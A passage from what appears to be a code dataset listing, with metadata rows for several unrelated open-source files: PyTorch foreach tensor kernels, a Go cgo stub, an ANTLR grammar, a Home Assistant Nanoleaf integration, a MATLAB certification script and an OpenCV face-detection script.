result.emplace_back(t.OP(scalar)); \
} \
\
return result; \
}
#define FOREACH_BINARY_OP_SCALARLIST(OP) \
void foreach_tensor_##OP##_scalarlist_kernel_slow_(TensorList tensors, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(tensors, scalars); \
\
for (const auto i : c10::irange(tensors.size())) { \
tensors[i].OP##_(scalars[i]); \
} \
} \
\
std::vector<Tensor> foreach_tensor_##OP##_scalarlist_kernel_slow(TensorList tensors, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(tensors, scalars); \
std::vector<Tensor> result; \
result.reserve(tensors.size()); \
for (const auto i : c10::irange(tensors.size())) { \
result.emplace_back(tensors[i].OP(scalars[i])); \
} \
\
return result; \
}
#define FOREACH_BINARY_OP_LIST(OP) \
std::vector<Tensor> foreach_tensor_##OP##_list_kernel_slow(TensorList tensors1, TensorList tensors2) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
std::vector<Tensor> result; \
result.reserve(tensors1.size()); \
for (const auto i : c10::irange(tensors1.size())) { \
result.emplace_back(tensors1[i].OP(tensors2[i])); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_list_kernel_slow_(TensorList tensors1, TensorList tensors2) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
for (const auto i : c10::irange(tensors1.size())) { \
tensors1[i].OP##_(tensors2[i]); \
} \
}
#define FOREACH_BINARY_OP_LIST_ALPHA(OP) \
std::vector<Tensor> foreach_tensor_##OP##_list_kernel_slow(TensorList tensors1, TensorList tensors2, const Scalar& alpha) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
std::vector<Tensor> result; \
result.reserve(tensors1.size()); \
for (const auto i : c10::irange(tensors1.size())) { \
result.emplace_back(tensors1[i].OP(tensors2[i], alpha)); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_list_kernel_slow_(TensorList tensors1, TensorList tensors2, const Scalar& alpha) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
for (const auto i : c10::irange(tensors1.size())) { \
tensors1[i].OP##_(tensors2[i], alpha); \
} \
}
#define FOREACH_UNARY_OP(OP) \
std::vector<Tensor> foreach_tensor_##OP##_slow(TensorList tensors) { \
check_foreach_api_restrictions(tensors); \
\
std::vector<Tensor> result; \
result.reserve(tensors.size()); \
for (const auto& t : tensors) { \
result.emplace_back(t.OP()); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_slow_(TensorList tensors) { \
check_foreach_api_restrictions(tensors); \
\
for (auto& t : tensors) { \
t.OP##_(); \
} \
}
#define FOREACH_POINTWISE_OP_SCALAR(OP) \
std::vector<Tensor> foreach_tensor_##OP##_scalar_slow(TensorList input, TensorList tensors1, TensorList tensors2, const Scalar& scalar) { \
check_foreach_api_restrictions(input, tensors1, tensors2); \
\
std::vector<Tensor> result; \
for(const auto i : c10::irange(input.size())) { \
result.emplace_back(input[i].OP(tensors1[i], tensors2[i], scalar)); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_scalar_slow_(TensorList input, TensorList tensors1, TensorList tensors2, const Scalar& scalar) { \
check_foreach_api_restrictions(input, tensors1, tensors2); \
\
for(const auto i : c10::irange(input.size())) { \
input[i].OP##_(tensors1[i], tensors2[i], scalar); \
} \
} \
#define FOREACH_POINTWISE_OP_SCALARLIST(OP) \
std::vector<Tensor> foreach_tensor_##OP##_scalarlist_slow(TensorList input, TensorList tensors1, TensorList tensors2, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(input, tensors1, tensors2, scalars); \
\
std::vector<Tensor> result; \
for(const auto i : c10::irange(input.size())) { \
result.emplace_back(input[i].OP(tensors1[i], tensors2[i], scalars[i])); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_scalarlist_slow_(TensorList input, TensorList tensors1, TensorList tensors2, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(input, tensors1, tensors2, scalars); \
\
for(const auto i : c10::irange(input.size())) { \
input[i].OP##_(tensors1[i], tensors2[i], scalars[i]); \
} \
} \
FOREACH_BINARY_OP_LIST_ALPHA(add);
FOREACH_BINARY_OP_LIST_ALPHA(sub);
FOREACH_BINARY_OP_SCALAR(add);
FOREACH_BINARY_OP_SCALAR(sub);
FOREACH_BINARY_OP_SCALAR(mul);
FOREACH_BINARY_OP_SCALAR(div);
FOREACH_BINARY_OP_SCALARLIST(add);
FOREACH_BINARY_OP_SCALARLIST(sub);
FOREACH_BINARY_OP_SCALARLIST(mul);
FOREACH_BINARY_OP_SCALARLIST(div);
FOREACH_BINARY_OP_LIST(mul);
FOREACH_BINARY_OP_LIST(div);
FOREACH_UNARY_OP(sqrt);
FOREACH_UNARY_OP(exp);
FOREACH_UNARY_OP(abs);
FOREACH_UNARY_OP(acos);
FOREACH_UNARY_OP(asin);
FOREACH_UNARY_OP(atan);
FOREACH_UNARY_OP(ceil);
FOREACH_UNARY_OP(cos);
FOREACH_UNARY_OP(cosh);
FOREACH_UNARY_OP(erf);
FOREACH_UNARY_OP(erfc);
FOREACH_UNARY_OP(expm1);
FOREACH_UNARY_OP(floor);
FOREACH_UNARY_OP(log);
FOREACH_UNARY_OP(log10);
FOREACH_UNARY_OP(log1p);
FOREACH_UNARY_OP(log2);
FOREACH_UNARY_OP(neg);
FOREACH_UNARY_OP(tan);
FOREACH_UNARY_OP(tanh);
FOREACH_UNARY_OP(sin);
FOREACH_UNARY_OP(sinh);
FOREACH_UNARY_OP(round);
FOREACH_UNARY_OP(lgamma);
FOREACH_UNARY_OP(frac);
FOREACH_UNARY_OP(trunc);
FOREACH_UNARY_OP(reciprocal);
FOREACH_UNARY_OP(sigmoid);
FOREACH_POINTWISE_OP_SCALAR(addcdiv);
FOREACH_POINTWISE_OP_SCALAR(addcmul);
FOREACH_POINTWISE_OP_SCALARLIST(addcdiv);
FOREACH_POINTWISE_OP_SCALARLIST(addcmul);
#define FOREACH_MAXIMUM_MINIMUM_OP(NAME) \
std::vector<Tensor> foreach_tensor_##NAME##_slow(TensorList tensors1, TensorList tensors2) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
std::vector<Tensor> result; \
result.reserve(tensors1.size()); \
for (const auto i : c10::irange(tensors1.size())) { \
result.emplace_back(at::NAME(tensors1[i], tensors2[i])); \
} \
\
return result; \
} \
FOREACH_MAXIMUM_MINIMUM_OP(maximum)
FOREACH_MAXIMUM_MINIMUM_OP(minimum)
void foreach_tensor_zero_slow_(TensorList tensors) {
check_foreach_api_restrictions(tensors);
for (auto& t : tensors) {
t.zero_();
}
}
}} // namespace at::native
| C++ | 5 | Hacky-DH/pytorch | aten/src/ATen/native/ForeachOpsKernels.cpp | [
"Intel"
] |
// Copyright 2010 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// The runtime package contains an uninitialized definition
// for runtime·iscgo. Override it to tell the runtime we're here.
// There are various function pointers that should be set too,
// but those depend on dynamic linker magic to get initialized
// correctly, and sometimes they break. This variable is a
// backup: it depends only on old C style static linking rules.
package cgo
import _ "unsafe" // for go:linkname
//go:linkname _iscgo runtime.iscgo
var _iscgo bool = true
| Go | 2 | Havoc-OS/androidprebuilts_go_linux-x86 | src/runtime/cgo/iscgo.go | [
"BSD-3-Clause"
] |
// @@ANTLR Tool Options@@: -trace
grammar t044trace;
options {
language = JavaScript;
}
a: '<' ((INT '+')=>b|c) '>';
b: c ('+' c)*;
c: INT;
INT: ('0'..'9')+;
WS: (' ' | '\n' | '\t')+ {$channel = HIDDEN;};
| G-code | 4 | DanielMabadeje/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials | java/java2py/antlr-3.1.3/runtime/JavaScript/tests/functional/t044trace.g | [
"Apache-2.0"
] |
"""The Nanoleaf integration."""
from __future__ import annotations
import asyncio
from dataclasses import dataclass
from datetime import timedelta
import logging
from aionanoleaf import (
EffectsEvent,
InvalidToken,
Nanoleaf,
StateEvent,
TouchEvent,
Unavailable,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_HOST,
CONF_TOKEN,
CONF_TYPE,
Platform,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed
from homeassistant.helpers import device_registry as dr
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .const import DOMAIN, NANOLEAF_EVENT, TOUCH_GESTURE_TRIGGER_MAP, TOUCH_MODELS
_LOGGER = logging.getLogger(__name__)
PLATFORMS = [Platform.BUTTON, Platform.LIGHT]
@dataclass
class NanoleafEntryData:
"""Class for sharing data within the Nanoleaf integration."""
device: Nanoleaf
coordinator: DataUpdateCoordinator
event_listener: asyncio.Task
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Nanoleaf from a config entry."""
nanoleaf = Nanoleaf(
async_get_clientsession(hass), entry.data[CONF_HOST], entry.data[CONF_TOKEN]
)
async def async_get_state() -> None:
"""Get the state of the device."""
try:
await nanoleaf.get_info()
except Unavailable as err:
raise UpdateFailed from err
except InvalidToken as err:
raise ConfigEntryAuthFailed from err
coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name=entry.title,
update_interval=timedelta(minutes=1),
update_method=async_get_state,
)
await coordinator.async_config_entry_first_refresh()
async def light_event_callback(event: StateEvent | EffectsEvent) -> None:
"""Receive state and effect event."""
coordinator.async_set_updated_data(None)
if supports_touch := nanoleaf.model in TOUCH_MODELS:
device_registry = dr.async_get(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=entry.entry_id,
identifiers={(DOMAIN, nanoleaf.serial_no)},
)
async def touch_event_callback(event: TouchEvent) -> None:
"""Receive touch event."""
gesture_type = TOUCH_GESTURE_TRIGGER_MAP.get(event.gesture_id)
if gesture_type is None:
_LOGGER.warning(
"Received unknown touch gesture ID %s", event.gesture_id
)
return
_LOGGER.debug("Received touch gesture %s", gesture_type)
hass.bus.async_fire(
NANOLEAF_EVENT,
{CONF_DEVICE_ID: device_entry.id, CONF_TYPE: gesture_type},
)
event_listener = asyncio.create_task(
nanoleaf.listen_events(
state_callback=light_event_callback,
effects_callback=light_event_callback,
touch_callback=touch_event_callback if supports_touch else None,
)
)
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = NanoleafEntryData(
nanoleaf, coordinator, event_listener
)
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
entry_data: NanoleafEntryData = hass.data[DOMAIN].pop(entry.entry_id)
entry_data.event_listener.cancel()
return True
| Python | 5 | liangleslie/core | homeassistant/components/nanoleaf/__init__.py | [
"Apache-2.0"
] |
unlink( "correct/rtrmatlab" );
if( system( "localmake_config matlab" ) ) {
system( "cp correct/rtrmatlab_disabled correct/rtrmatlab" );
exit( 0 );
} elsif( ! -e "$ENV{'ANTELOPE'}/setup.m" ) {
system( "cp correct/rtrmatlab_blank correct/rtrmatlab" );
exit( 0 );
}
system( "cp correct/rtrmatlab_enabled correct/rtrmatlab" );
system( "rtrun_matlab" );
exit( 0 );
| XProc | 3 | jreyes1108/antelope_contrib | bin/rt/rtrun_matlab/certify/try_rtrun_matlab.xpl | [
"BSD-2-Clause",
"MIT"
] |
## Name - Soumyajit Chakraborty
## place - kolkata
## date - 10 / 08 / 2020
import cv2 as cv
face_cascade = cv.CascadeClassifier("..\libs\haarcascade_frontalface_default.xml")
face_cascade_eye = cv.CascadeClassifier("..\libs\haarcascade_eye.xml")
# face_glass = cv.CascadeClassifier('..\libs\haarcascade_eye_tree_eyeglasses.xml')
cap = cv.VideoCapture(0)
while cap.isOpened():
falg, img = cap.read() # start reading the camera output i mean frames
# cap.read() returning a bool value and a frame onject type value
gray = cv.cvtColor(
img, cv.COLOR_BGR2GRAY
) # converting to grayscale image to perform smoother
faces = face_cascade.detectMultiScale(
img, 1.1, 7
) # we use detectMultiscale library function to detect the predefined structures of a face
eyes = face_cascade_eye.detectMultiScale(img, 1.1, 7)
# using for loops we are trying to read each and every frame and map
for (x, y, w, h) in faces:
cv.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 1)
for (a, b, c, d) in eyes:
cv.rectangle(img, (a, b), (a + c, b + d), (255, 0, 0), 1)
cv.imshow("img", img)
c = cv.waitKey(1)
if c == ord("q"):
break
cv.release()
cv.destroyAllWindows()
| Python | 4 | Wish1991/Python | Face and eye Recognition/face_recofnation_first.py | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.